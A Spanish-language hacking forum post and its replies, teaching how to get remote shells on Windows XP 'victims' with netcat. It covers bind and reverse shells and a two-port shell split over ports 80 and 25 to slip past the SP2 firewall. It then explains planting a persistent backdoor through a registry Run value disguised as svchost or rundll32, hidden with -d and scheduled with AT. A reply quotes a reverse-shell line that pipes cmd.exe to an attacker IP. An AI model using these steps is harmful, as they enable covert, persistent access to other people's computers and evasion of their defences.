YA ESTA DISPONIBLE EN PDF

Para todos aquellos que lo quieran descargar aqui estan dos url de descarga:

http://mx.geocities.com/zhyzura/Shell.con.Netcat.by.zhyzura.pdf

mirror brujo's (esta descarga es mas rapida y sin limite de conexion)

http://personal.telefonica.terra.es/web/alexb/manus/Shell.con.Netcat.by.zhyzura.zip



Pues bien, como todos sabemos una de las tantas utilidades que tiene esta maravillosa herramienta es la de poder

devolvernos una shell de un equipo sin ninguna dificultad, inclusive aun estando detras de una red y por que no...

hasta del firewall de windows xp Sp2 .
muchos de los exploits que circulan por la red estan basados en el funcionamiento de netcat, asi de que aprender a

manejarlo es lo primero que se debe de saber.
Espero explicarme de una manera clara y sencilla de manera que a cualquiera que lea esto le quede claro como obtener una shell con netcat.

Ahora si dejemonos de tanta platica y comencemos con la practica ...




Para mi ejemplo voy a utilizar dos equipos:
Equipo atacante [192.168.1.2]: Windows xp sp1.

Equipo victima [192.168.1.4]: Windows xp Sp2.



[SHELL DIRECTA CON LA VICTIMA]

Nota: si utilizas un puerto el cual este protegido por el firewall de windows tendras que habilitarlo previamente

para poderlo poner a la escucha.

Esto no es nada dificil de lograr lo unico que necesitamos de hacer es dejar un netcat a la escucha en la victima de

la siguiente manera  (solo decir que en win9x seria "command.com" y en un NT seria "cmd.exe"):


donde los flags significan lo siguiente:
-d  (Modo Stealth o encubierto)
Esta opción desvincula al Programa de la consola, haciendolo
trabajar en el BackGround.

-e <prog>  (Ejecuta un programa cuando se conecta)
Puede ser utilizado para ejecutar incluso un Shell tanto
en WinX como en *NIX.

-l  (Escuchando conexiones)
Deja a un puerto abierto en espera de una conexión

-p <puerto> (Puerto para pegarse)
Algunas veces debes especificarle con esta
opción el puerto a realizar una acción.

-v   (modo verbose, mas información, se le puede añadir otra -v para mas
info todavia) Bastante util y necesario.

-L Es mas recomendable usar esta opcion que la opcion "-l" ya que al cerrar una conexion podemos volver a iniciarla sin necesidad de que el equipo victima vuelva a reiniciar su pc. (en mis ejemplos voy a usar -l pero sugiero poner -L)


Lo ideal es que tengas el nc.exe dentro de la carpeta system32 en caso contrario tendras que especificar la

direccion en la que se encuentra:


una vez hecho esto solo falta que nosotros nos conectemos a la victima en el puerto especificado (en este caso es el

6000), y asi nos devolvera la shell:


Recuerden que para que este tipo de conexion funcione, la victima tiene que tener una "ip publica", esto es que sea

visible por cualquier equipo con el simple hecho de que este conectedo a internet.





[REVERSE SHELL CON NETCAT]

Este tipo de conexion es ideal para equipos que se encuentran dentro de una red, lo unico que necesitamos es que el

equipo atacante tenga una "ip publica", de esta manera sera la victima quien se conecte a nosotros y no nosotros con

el.

Para ello primero tenemos que dejar un netcat a la escucha en el equipo atacante de la siguiente manera:


ahora que el atacante esta preparado solo tenemos que hacer que la victima "sirva" la shell al puerto que tiene en

escucha el equipo atacante, de la siguiente manera:







[VOLTEAR LA SHELL CON NETCAT]

Como habran observado en los dos ejemplos anteriores para poder hacer una conexion exitosa con la victima, un

requisito indispensable es que el puerto que estemos utilizando lo tengamos habilitado por el firewall, asi de que

si la victima tiene el firewall activado a la hora de que realicemos dicho proceso le va a saltar la pantalla de

alerta del firewall que tiene incluido el Sp2 y eso nos va a delatar al momento .

por lo tanto lo mejor que podemos hacer para que esto no ocurra seria utilizar puertos que no esten filtrados por un

firewall o por un router con firewall integrado, para ello vamos a utilizar dos puertos uno para enviar la

informacion y otro para resivirla, y como todos sabran, la mayoria de los firewall tienen habilitados los puertos

80(http) y 25(smtp), inclusive el firewall del Sp2 los tiene habilitados por default (por eso adoro a microsoft

xDDD).

Suena algo raro y ademas dificil pero ya veran que es muy facil de hacer (este tipo de conexion funciona tambien con

equipos en los cuales la victima se encuentra dentro de una red).

En primer lugar vamos a necesitar poner dos netcat a la escucha en el equipo atacante (cada uno en su propia ventana

o indicador de comando, como gusten llamarle).

en uno ponemos el puerto 80:

y en el otro ponemos el puerto 25:

Ya que tenemos todo listo, basta con que el equipo victima ejecute el siguiente comando (recordar que en mi ejemplo

el atacante tiene ip 192.168.1.2 o tambien puede ser uno que posea una ip publica a fin de cuentas es una conexion

inversa ):


y walaa!!!!! ya tenemos la shell de nuestra victima y el firewall del sp2 no dira ni pio, ya que por defecto admite

la entrada de informacion por el puerto 80 y la salida por el 25.

Ahora bien ¿como vamos a mandar los comandos a la shell remota y donde vamos a ver los resultados?
como dije anteriormente nosotros le vamos a enviar los comandos desde la ventana en la cual teniamos el netcat a la

escucha en el puerto 80 y automaticamente la victima nos va a devolver los resultados en la ventana que tiene el

netcat a la escucha en el puerto 25.






[DEJARLO COMO PUERTA TRASERA]

Una manera muy usada seria dejar una llave en el registro que nos ejecute el netcat cada que se prenda el pc

victima, para ello tenemos que hacer lo siguiente:

damos un click en inicio > ejecutar > regedit
una vez abierto el registro de windows nos ubicamos en la siguiente rama:


damos click derecho > nuevo > valor alfanumerico.
le pònemos un nombre que no levante sospechas como rundll32, svchost, etc. ( no le vallan a poner servernetcat,

virus, etc por que los van a cachar rapidamente)
Despues le damos click derecho al valor que creamos > modificar. Y agregamos la ruta del netcat con sus respectivos

parametros:

si quieren que se quede en un puerto a la escucha:

si quieren que conecte con una ip:

si quieren voltear la shell para que no la detcte un firewall seria (recuerden que es con la ip del atacante):
solo agregar que si lo ponemos de esta manera, a la hora de que inicie el pc va a aparecer la ventana de ms-dos y si la cierra la victima perderemos la shell...
por lo tanto no olvidemos que podemos agregar la opcion -d para que permanesca oculta.
haciendo lo dicho anteriormente quedaria el comando de la siguiente manera:


Para agregar una nueva llave al registro desde una shell remota lo que tenemos que teclear seria lo siguiente:
(asi seria tomendo en cuenta que el nc esta en el directorio raiz del hdd)


una desventaja de agregar este tipo de entradas es que en las conexiones inversas el atacante primero tendria que

dejar un netcat a la escucha si no no funcionaria por lo tanto lo que podemos hacer aqui es dejarlo programado para

que se ejecute diariamente a determinada hora que nosotros ya tengamos previamente nuestro netcat a la espera de la

shell, para esto vamos a utilizar el comando AT, la sintaxis seria la siguiente:


por lo tanto quedaria asi:


o tambien:


de esta manera ejecutara el netcat todos los dias 1 de cada mes del año a las 6:00 p.m. asi de que si quieren que se ejecute todos los dias hagan lo mismo agregando los numeros 1,2,3...30, no los intenten poner todos de un solo jalon por que no les va a funcionar, lo van a tener que hacer de uno por uno:



Asi seria tomando en cuenta de que el nc ya se encuentre en system32, en caso contrario van a tener que poner la ruta del netcat. ejemplo:


para verificar que se haya agregado la tarea solo tecleen:

si quieren ver todas las opciones del comando at solo teclen:








Espero les haya gustado mi explicacion, cualquier duda o aclaracion sobre el presente texto favor de preguntar o

decirmelo lo antes posible

Referencia:
Sacandole Provecho a una exelente Utilidad by kliber

zaludox y Gracias a Gospel por animarme a hacer este texto   (siempre terminas convenciendome de hacer este tipo de cosas xDD)

excelente texto, ya lo habia probado hace mucho, es excelente, tambien para usarlo de backdoor..
felicidades, el texto esta muy bien explicado y ayudara a mas de uno, es excelente para los cibers;)
saludos

muy bueno, ahora hay que probarlo, con un poco de tiempo hare mis pruebitas


saludox

Esta realmente bueno el post pero ahora me entra una duda, para lograr obtener la shell tienes que tener acceso fisico al pc, estoy cierto o errado, y si esoy cierto cual seria la finalidad de la shell puesto que con acceso fisico poderiamos hacer qualquier cosa en el sistema

Sinceramente no te entiendo
ya que si tu consigues tener acceso al sistema no creo que el mejor backdoor seria el NetCat ya que es muy facil de detectar.
Mas quizas una finalidad buena seria crear un .exe que vaje el archivo de un ftp y de entradas en el registro de win y assi lo ejecute cadavez que inicie el sistema.
Sin embargo no podemos dejar de reconocer que es una maravillosa herramienta.
Espero sugestiones para el .exe despues que lo termine de programar lo voy a colgar en una web y espero sus sugestiones 
Salu2s para todos..

una duda sobre el paper en el apartado voltear shell con netcat

cuando te refieres a burlar el firewall te refieres el de la victima o el firewall del atacante   

por que veo que te refieres al de la victima y no es posible por que si tu como atacante dejas los puertos 25 y 80 y a la victima le pones los comandos para hacer la reverseshell que son estos

nc ipatacante 80 | cmd.exe | nc ipatacante 25

entonces lo que va apasar en la victima es que la pc de la victima intentara conectarse por unos puertos al azar
ejemplos 3987 y 6459 y el router no permitira la salida de esa informacion o el firewall saltara 

y es que los puertos 25 y 80 son los de tu pc que vas a  establecer conexion no los de tu victima los de tu victima seran al azar

CORREGI ESO ZHYZURA

Un gran manual! Sí señor! Espero que te animes a pasarlo a formato pdf y que se cuelge en textos/manuales del web de este foro.
Yo que estoy empezando a manejarme con el netcat he de decir que no tuve problemas para entenderlo. Estoy leyendo el manual de Kibler (se lo recomiendo).
Una duda, las situaciones para usar netcat son:
1.- Acceso físico a la máquina + netcat
2.- Exploits + netcat

¿me dejo alguna?
Saludos a todos, y seguid así.

creo que voy a tener que verificar eso por que a mi no me salio ninguna ventana ya que la shell se ejecuta con privilegios de system y por lo yanto no debe de aparecer ninguna ventana ya que system trabaja en otro entorno muy diferente al del usuario.

de todas maneras hoy averiguo por que te aparece la ventana...